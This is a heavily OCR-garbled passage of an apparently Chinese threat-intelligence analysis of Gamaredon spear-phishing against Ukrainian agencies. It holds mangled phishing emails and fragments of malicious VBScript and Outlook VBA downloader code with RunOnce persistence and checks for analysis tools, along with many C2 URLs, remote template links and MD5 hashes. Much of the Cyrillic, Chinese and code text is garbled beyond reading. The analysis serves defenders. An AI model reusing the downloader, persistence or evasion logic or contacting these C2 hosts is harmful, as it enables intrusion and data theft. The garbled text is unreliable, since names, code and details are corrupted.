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From: Aptem Binui [mailto:abeliy@adps.dpsu
Sent: Monday, February 3, 2020 8:35 AM

To: SVChernytsia@adps.dpsu
Subject: FW: [InA BHECEHHA NPONOIMLLH

From: WTab ATU npu CB Ykpaiiu [mailto:atc ssu.gov.ua@post.cz]
Sent: Thursday, January 23, 2020 7:02 PM

To: abeliy@dpsu.gov.ua

Subject: Ana EHeceHHA NpoNo3MUI

JloBigKa mog0 NOTOMHOTO CTAHY Ha HAIPAMKIE mogansmoro pedopyysanss Cuy:xon dDeznexn Yipainu

HabriaE s E Xt

R RAFEA) KA

1/18


https://ti.qianxin.com/blog/articles/Hackers-in-Eastern-Europe-Use-Harpoon-Mail-to-Target-Activities-in-Ukraine/

Ons posrnany Ta BHeceHHs nponoauuin (B IXFIIRAT R 2020-04-13 22:43 COVID-19, kEE
+
=) UTC+8 =
CekpetapiaT <secretar-apu@i.ua>
[\ns po3rAAAY Ta BHECEHHA MPONO3WLiN
WA iac2@mbogovua
O Epmusrzanacs.
[ ) MOACHIOBATILHA SATMCKADOCK
Mposkr Saxouy Vxpaium aps i1 56 ReAN 2anouCRE SR axDin vrpasum =anosiraunn e oviD-19)

BHOGHTsGR #a po=7AS EapeRmEm SRy TaTaa Vrpa i

Panyueknit M.5., Comap B.IL, Koporescoxa K0, Bincsip LM, Bememomxmat C.A, Tepefuin ic MB., yBHOS A8, Kenesuax A1, IyBiss B.0.

DAITHRNE, [RS8 <A 4E
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[HbopmaLiiHo-aHaniTuYHe gocnigkeHHs ({5ES9HHF  2020-06-17 22:44 . EEmsRRA. B
3T) UTC+8 i

Casuyk K.M. <k.savchuk@mail-info.space>
IHpopMaLinHO-aHaNITHUYHE JOCIKEHHS

WrigA  dpsu@dpsu.gov.ua

O nEETEANAREEE, ERSMALE Web HSBRTE S,

focnimxents.rar .
G 47 KB

3 NoBAarom,

3aBiAlyBAad4 BiLlily 3aKOHOJNAEBCTEA ¥ Chepj HALjOHANNBHOj 6e3NeKH Ta
KPMMiHANTBHOTI O 3AaKOHOJABCTBA

AUPEKTOPATY 9 NUTA&HDL NMPA&BOBO] NONiTHKH
Capuyk K. II.

01220, M, KMiB, B¥ T

. BaHxoBa, 11,
(044) 255-73-33

PR AT M B MEiE E MR S A FE 1508 . b

e A AFE] K]

OnepatuBHe 3BefeHHA (IZETHRE)

=]

2020-07-28 18:08 UTC+8 SBU. DZND. #\#4. #¥l

SSU <atc@kyiv-mail.site>

OnepaTHBHe 3BeeHHA
WA, ab75zak@ssu.gov.ua

3BeAeHHA.rar

G5 237 KB i

ONepaTWMEHe 3BedeHHA CTAaHOM Ha 28 TMIOHA 2020 POKY
(38 MaTepianaMi J3HJ Ta peTioHAaNTBHUY 0pTraHie CEY)
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2/18



Mpo HenpaBoMipHi Aii cnigdoro CB Ykpainn (T2 E#E RiIEx

i7M)

2020-09-23 15:33 EIITN
UTC+8 e

Knimos Onekcanap Mukonanosunu <klimov@email-online.site>

Mpo HenpasomipHi Al criguoro CB Ykpaitu
HiEA  ab75zak@ssu.gov.ua

O ussruEEnATERE, FRSWIE Web NISSEETEREE,

=—| po Henpasomiphi aii criguoro CB Ykpainndocox
mé 20 KB

Mpowy BEac HaAaTHW NpaBOoBY OUHEY IOijdM BaWoro CHO{BPO0G{iTHHUEa!

3 NOBaAromp,

AFBOKAT KNiM0OB ONeKCcaHAp MUKONAWMOBHUY
T e M. : +38(067) 159-20-69
email: klimov@email-enline. site

TR ST EREAIREHEE

R

R AR K

Ne23\01-12\38 Big 05.10.2020 2020-10-05 18:31 UTC+8 ESiAICE. L7mHR. 1

Onekcangpa benokyapwn <o.belokurdi@email-online.site>
N923\01-12\38 si 05.10.2020

= Xop
=| 43KB

BilNOBiAb Ha XYPHAMCTCEKUN 34NUT NPOMY HaQaTU ¥y BUSHAYEHUN 3aK0HOM TepHMiH, TAKOX NPOWY BPaxyBaT
u,

mo BMXiA MaTepijany 3aNlaHoBaHUM Ha 13.10.2020.

3 mosaromn,

XKYyPHANCT TeNeKaHaANY “ZIK
OnexcanApa BEenokyapi

ENeKTPOHHA MOWTA: o belokurdi@enail-online. site
MOB{NbHNUMA HOMEP TeNedoHy: 093-291-5445

TR ERE AL TI0E

G

AAFHSA) KA

i%

¥)

TepmiHoBo. 3aTpumanHs Goesuka OHP (E2ih, HEBDNRIFHES 2020-11-19 16:45

UTC+8 yiiil

Irop JaavHcekui <i.dadinskiy@i.ua>

Tepminoso. 3aTpumanna Goesuka IHP

Hrft A usbu_vol@ssu.govua

i J=i0 St 2ot

SHALIMOV.DOCX
57 KB

Mpowy TepriHoBO NpMitsATH MipK N0 SaTpyMassn Soesuka ManimMcosa.

Byopa sycTpis 1 nannmey, TyNAc 0o MicTy AK Hi B oMy He Bysano.

Bignoeige © npmiEaTHX Mipax pearyBaHEA IpONy HaNaTH HA MOK SIEXTPOREY a0pecy.

3 nosarom Irop JanMECEKMA

-- peRmaMa

MoToponucs SaperucTPMPOBATE CaMEl KOpOTKMA I04TOB:N anpec @L.ua https://maili.ua/res - u nonyun 1Gb nna xpaserna mucen
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SHALIMOV.DOCX
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proserpinus.online/nevertheless/LwRoTct.dot

17-
11_8ig_25.11.2020.docx

6abde64d0e51ba00cccab05365570cea kasidvk.3utilities.com/instructor/wDewdIf.dot

17-
11_8ig_25.11.2020.docx
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WANAMOB B. T.

[ SHalimov Vadim Genn... |

v x

o

IHATHMOBB.TI..
SHalimov Vadim Gennadievich .

o
Anpec: Jonenxas o0m., . K

ca, y

jikods.hopto.org/heap/EAURVHK.dot

an, 171+

Cenapatnct, Goesnxk HB®. +
Jata poxgenna: 05.07.1984.+
CIIT Ne27, 1991-2000, r. KoHCTAHTHHOEKA. +

o

17-11_sig_25.11.2020.docx XA AT -

IPOMA/ICbKA OPFAHI3ALIS
LIEHTP LOC/IAXEHHSA BE3MEKOBOIO CEPELOBULLA
«MPOMETEM»

79059, M. JTbBiB, BYN. [OHa JleHHOHa, 33/18
Ten. +38 066-350-44-26
E-mail: prometheus@email-info.online

Bux. N2 17/11 Bif 25.11.2020 p.

MocTiiiHomy MpeacTaBHKKy MpesngeHTa Ykpaiin
B ABTOHOMHIl Pecny6niui Kpum

KopuHemyy A. O.

LLaHoBHWII AHTOHe OneKkcaHApoBUYY!

LIeHTp AocnipkeHHs 6e3nekoBoro cepeloBULLa «poMeTely, AKUA €
3apeecTPOBaHOI HeNPUBYTKOBOK MPOMAACHKOK OpraHisalieio,
3BEpTaETbeA [0 Bac 3 NponosuLiieto cTaTi napTHepoM B peanisallii
NpPOEKTY «BipTyanbHuit My3eii pociiicbkoi arpecii».

[laHui NPoeKT Nepeabadac CTBOPEHHS BE6-NOPTaNy, NPUCBAYEHOTO
o6cTaBUHaM, NOAIAM Ta Hacnigkam pociiicekol okynauii Kpumy. Moro
MeTa nonsrae B NpeAcTaBAeHHi y cy4acHoMy Ta AOCTYNHOMY BUrNAAI
3a[JOKYMEHTOBaHUX MOAil Ta 3M104MHIB, CKOEHUX Nifj Yac okynalii
Kpumy Pociitcbkoto defepalieto; peaniaallii 0iHOro 3 eneMeHTIs
nepexifHoro NpaBocyaAs — 3abesnedeHHs NpaBa niogeil 3HaTn
npasAy Ta 36eperTh NaM'ATb NPO NPUYUHK, Nepeir Ta KNto4oBi oAl
KOHpiKTY.

B OCHOBY 3MiCTy Be6-NopTany NepeadadacTbcA NOKNACTH MaTepiani
(30kpeMa, 6a3u JaHuX), 3i6paHi JepXaBHUMM | Hef\epXKaBHUMN

Ctpanuma & concersx: http//ok ru/vadim shalimove

JEBRFAL
EBK(EH R RIEAZTRL

79059, FliEFk, BEIEFUR (33/18)
EBjE+38 066-350-44-26
EEFHB{4: prometheus@email-info.online

fiRINe17/11B587925.11.2020
CREBAEIENE
EREKI ISR
NERES

FEMNRFR TAUEDES!

ZEIMEHZT AL Prometheus” 2ITMMFEERNMEATHAR, iR
A BT R EISE BN A .

BB REV— S I ESI S TR EXTNER, SHNER
RJPREE. EENEA—FIRAAS TR 2 HE RIS
SRR RN EAENEIRICRNCT S, e ER BalENE
B REATREEEINE, FHERWPEER, SEAEE
NI,

&I PR RN G E T BT F BT AR SR SR BRI
EAXNEE GCEEHIERE) . A, HIET T ZIEREL
8, AN IR EE S SHIINER, ZRBFRZET
BEYSIATENIMRREE B ENERES, FaERnIzEE/
BifE), EHE5E, WERFINEHTEIHF. XERESR=&
ENEISMIEZ—. #5E, SEENEREXITEVHOTHSES
SRE BRI BRI,
BEHEREES SR A TE BB R ESIE RS
FRRERY.

B ERZEES SR RIS R EINEYR N ST ERN A AT | 1T R NERERS
2 N A B EAKDOt Y |, SIMANAMNT ¢
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RAEETNREMLEAER S Z BB KREN

Docum

TEokInRm
IEokInRmI tebject(™ +
mV10IBEIT teObject(™ +
+ P+
)+
PQgssqbEb = PVRAMIESe + . + "o"
If Not mVIOIBEIL.FileExists(PQgssqbeb) Th
mV10IBEII.CopyFile VZDrWEXIB, PQgSSqbED,
YbBIEFMDI = PVRMIESe + " + . g U 7T T4 D
POgssqbEb & ™ . . . g 477 47" + "7 & YbBIEFMbL

mV10TBEIT .CreateTextFile(YbBIEFMbT,

- - R

+ 70"+
+ 74T R vhCrLf

cVAZWNRAIN
" & ubCrLf
& vbCrLf

uk.brite
(SSuk.Hrite

(SSuk.Hrite

& vbCrLf

FwscriptE 5 4 A GoogleDiskH % 3h% %appdata%\ Local\Microsoft\Windows B % T , BIBFFEiZ B K FRRIR4E A

GoogleDisk.vbsfISL 4317 , GoogleDisk.vbsNAZNTF :

T
""" & vbCrLf
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NbEijBGVF (LHQHtifXX)
NQIJKKRTh

NQIIKKRTh.BadyPart.Con
ekLpQcgUil

NQIIKKRTh.BodyPart .Get
NbEijBGVF RTh.BodyPart .

LHQHEI X
LHQHEI X
LHQHE T,
LHQHEF
LHQHEI X

LHQHEI X XX+ v4dA v

LHQHE T, X+ i ( p )))& vbCrLf
LHQHEF,

LHQHEI X

LHQHE 1 FXX=
LHQHE LT

iR B —NVBSHZAFIIT , iR EHEA GamaredonZBLR# FRIVBS Downloader , MBIt 7EMRIEIFAML :
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\GoogleDisk

Each Pr In WMI.ExecQuer

WINPT E B 7 fEprocexp, wireshark, tcpdumpEn#T TR
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If objItem.Name =

p 17 =p_ 17 p +

C2 : vincula[.]Jonline/interdependent_/25.11/item.php

HAVR BRI T RITTEN N —LREA , RN BMT ¢

=5 zoezA. | E2ERS =n zEezA. | EARE

|
B —RMNETHE LM ARTER AL S VBSHATIKZE T 2k Sk payload B B MES T

Repluln = ZTwel RenCoer ¢ “htas # e /O ¥ e+ e /T4 TCMES 4 T D AU 4 37k 08 A Jt B4 TS U 4 e e 7 4 GO 0, R
HGtert ks “ea” e

), False)
WL NCERY “anerSof” £ “tfa” + "ra fir “askli” + "LL £ fim Prin” + “t50ftn” + "are. e’ + "e"*", 0, False)
Glezml “nts, ey
GIFPHut - /M L /v /( B “ntSoftw” + " + Yare [tr "™ + Glaznsl + ", 0, Falss)

DTN et B i ttion vorstn a_
"ot +

Createl] RS ik R IS
I + m”

Lreat t + 5T - 8 & VBT + 'Al-rr' + it 4 gt 1, E BT
FIEDKST = ZKATwol Bun (™" + «CCGITK + *, 4, Falze)

i FrcC2an T

decursio[.]Jonline/index.html
darvini[.]xyz/{Computer_info}/pr_/20/index.html
Lnk¥54H

2020F6 REI10 A HAE] , BAMEENNE | — B ERAI LR ETER , WEEIONER |, B WIRII1RE
RANRKAIBRE,
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IHpopmaLinHo-aHaniTHHe AochigpKeHHA

WA dpsu@dpsu.gov.ua
O nESTHsEAT AT, BREUALE Web NEBRSTTEE,

JNocnigxenna.rar

GIRY 47 KB

3 MoBAaromn,

3apBiAyBaY BifAijNy 3aKoHOAABCTBA ¥ Chepj HALjOHANLHO] 6e30eKM Ta
KpPHMMiHATBHOIN O 3aKOHOOABCTEA

AUMpeKTOpPaTy 3 NHUTAHDbD NMPpaBoOBOf TONTUKH

CapuyK K. II.

01220, M., KMyB, B¥ T, EaHKoBa, 11.
(044) 255-73-32

HBEFRHAF A E SR B 82 T — /> Gamaredon £B£R % FIFIAEAR N SUAFFI— Lk

-

ER

L .
0= Aosiaka.docx
L . . . .
M= MNpakTuyHi 3ax0aM Woao EMABAEHHA Ta 3anobiraHHa 3arposam y chepi Bopotebu 3 MixHapogHum Tepopuamom.ink

X% MD35 3
ﬂ
MpakTuyHi 3axoam Woao BUSBNEHHs Ta 3anobiraHHs 3arpo3amy  4423f7fb0367292571150f4a16cdec9a  Lnk
cdhepi 6opoTbbM 3 MikHapoaHUM Tepopuamom.Ink (FEFTHE R X
bt 3 SLATU TS RE RO LE BRI KRR AE ) fan

LnkSCHIhREBCA T |, A Amshta i TimFz i htas £

C2 : inform[.J3utilities.com/lib64/index.html

AL RS 2% LNt mISC R AT -
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aFrkQike
gFrkQIike

)-BodyPart

ikesA+( (MLIQFVED
ikcSA+( (MLIQFVBDAZY (
i

L)
3

Kcsie (HL20FvBOAZY(

Createobject(
eate0bj
ExpandEnvir

p_34 p - Creat.
p_34 p.visible

2

berLf

bCrLf

)& vbCrLf

1
I8 vberLt

& vhe
crif

Lf

icmlul
")))& vbCrif

10/18



1

fod

BN R E-Sii] Foh
¥ Document RTF &5 13 KB
PrintHood VBScript Script ... 4 KB

4 KB

4> Rk PrintHood. vbs I Z R £ SkfIPrintHood.exe Sl M TRIHES

, B R XS PrintHood.vbs SREIF A 4,
& JatTFFDocument.rtf3 #4314 TPrintHood.vbs

Document - Microsoft Word

=E HE
s, Al iZ.i=-4Z. ESE M- 4] # | asebcedd | Assbcend AaBE AaBb( AaBb
A-ae =s==EE = JEx | «XAE  wE1  BE2  &E
= =t
o

PrintHood. vbs AT , £543RBUTEM & F3 ISPk User-Agent

2"+ medtI + "::”

MITAZ RS2SR | AT PATICAFFFRAT
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iubrr.Write (akKrga)
iubrr.Position = @

oilyC =

iubrr.SaveToFile (hwJHd)
iubrr.Close
WScript.S5leep zIKeC(9208,35808)

End if

num = 1
o While Num > @
Wscript.5leep zIKeC({390886,6530000)

gHksv
qu:S-.r = {r‘E-EItEC:L‘IjEu:t -i:-'tir'lgg.FilE'E-j-.'E
Texts = gHksv.Dri -

kkfpe dErnb(™F iventris.online/index.html™)

CreateObject(" el1™).Run hwJHd

C2 : cultiventris[.]Jonline/index.html

Z5HE , BANEE T —HEIRKhmIS , EXSH DI AB T T payloadi FHE A 5 —E&1E.

temObject™)

Sextig A REPHE /income.php” , EIZFEARFZFRACTENK , AIRIREIRLAET 200 , WISAREUSRAE X N HKIPFHIER

B linterrupt.php” B AR EK

HBFRC2NT , BLEBASRAEATNBLEFEES.
C2

rainbowt[.]site/income.php
78[.]40.219.213/interrupt.php
rainbowt[.]site/inspector.php
78[.140.219.213/intimate.php
decursio[.]Jonline/index.html

coriandrum].]xyz/index.html

caruman[.]xyz/index.html

ST KO H LKA TR LT T2 — 2, B RA—RRARAE k.
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Macitht s ] 7 : PCS Computer Systems GmbH , h7Z1E{hiE machb e Bt TR B K Lnk AR TR IE 4

T

paL

MD5

C2

Llono nepesipkn thakTis
NOPYLUEHHS
KopynuinHoro
3aKoHogaBcTBa 3 BOKy
cniBpoObiTHuka IMNIMY B
AP Kpum.Ink (EFRE
KT BAEMEPPUR
TxhERBBALIEE K
AIAZER. )

88b6af1f1583e80dbd3e5930f042cf95

sangorits.hopto.org/reply/updates.html

[onogiab 3a gaHnmm
3BiTy CMM OBCE Big
08.09.2020 214-
2020.Ink (HRHEERZLALR
SMMRE HHAA
08.09.2020 214-
2020.InkaF 4 )

02aae0f838095a9d70004dae8d600aa

forkasimov.hopto.org/beau/updates.html

OnepaTtvBHe 3BeOEHHS
CTaHOM Ha 28 nunHsA
2020 poky (3a
maTepianamu O3H[ Ta
perioHanbHMX OpraHis
CBY).Ink (EKZE202047
R28AMbEHIE (1R
HEL = E RS AR
RS R=%4e FX
HAARIMEL) )

aa7c27927cdc2752fb19edb5ebef77c2e

sort.freedynamicdns.org/home/key.html
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KnonoTaHHs npo c307be292d9b688827c22de2464abb32 hiodus.bounceme.net/nations/history.html
TMMYacoBUN JOCTYN A0
peyen i LOKYMEHTIB Y
KpuMiHansHoOMy
NPOBaKEHHI
22019180000000342
Bia 11.03.2020 poky.Ink
(EsKieBtAla B HAA
20203 A 11 HHHIE
ViU
22019180000000342¢]
PIEn IS )

Poswundposka npo 6667410352cbba61e7c49389d55921a1 geros.freedynamicdns.org/bin/key.html
nebiTopcbky Ta

KPeANTOPCbKY

3aboproBaHicTb 3a

OHOIKETHUMW KOoLUTaMU

ctaHom Ha 01.07.2020

poky.Ink (EZE

01.07.2020.Ink\TE &

& N WG A R A 7R

fit®)

SFXHZ

Gamaredon APTARZRIER B K(FEFSFX Rt EfRT. % NipayloadBVBS, CMD, OTMZIC#F , ERN4H
BN HAETITT A, EFEEEI T IEITSFXHITVBSHIARTER St outLook B & X Mk , SFX3C
HRBWT -

0= contact.docx Microsoft Word ... 24 KB
) VbaProject.OTM Outlook VBA T... 48 KB
VBS.vbs VBScript Script ... 3KB

VBS4iF Foutlook L “/altvba’$$ f25)VbaProject. OTM

WshShell.Run “cn 2 " + PathFrom + "", @,

VbaProject. OTMA 1 = R BS 4 SREL R AEAR JF A4S contact. doox 3t THE A EXIPNBE

14/18



me(cuntIt
rCon

LogUser (“Cre
MObj .BodyFormat

LogUser
f VBA.
tif:

Environ("U: p
f1 = objF50.0OpenTextFile(PathTolog, 8)
fl.writeline Now & " " & Textl

BRI SMERB AL HIPITIRAR , SEXBITCMDEIA

st_IqcGQB r iF
If st_IqcGOB.Fileexi ) Then st_IqcGOB.DeleteFile sr
st_IqcGQB=
-_bHQHE.

acr_bHgHED.
acr_bHqHED.
acr_bHqHE] . Write(data)
acr_bHgHE.Positio
acr_bHgHED.5
acr_bHqHE] .

PIRESTR , BARVBSHIAI AT , VBSK#ZPostizsK , #REXF4kpayload
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sremMed) And df

C2:
strigigena[.]Jru/cookie.php

testudos|.]Jru/agree/reference/hasty.html

foks ]

APTI I HISRR AR B S AT A BUAK B EEMEX | R R TH20204F , AR EERIRK20214 , ZRRX
WX FHLEM™R , X —HX KGR T A M

FRAZBIMEIRT OIREE KA/, YIZFTIFHARE S F R AR AR | A REPITRASRIRAERHH
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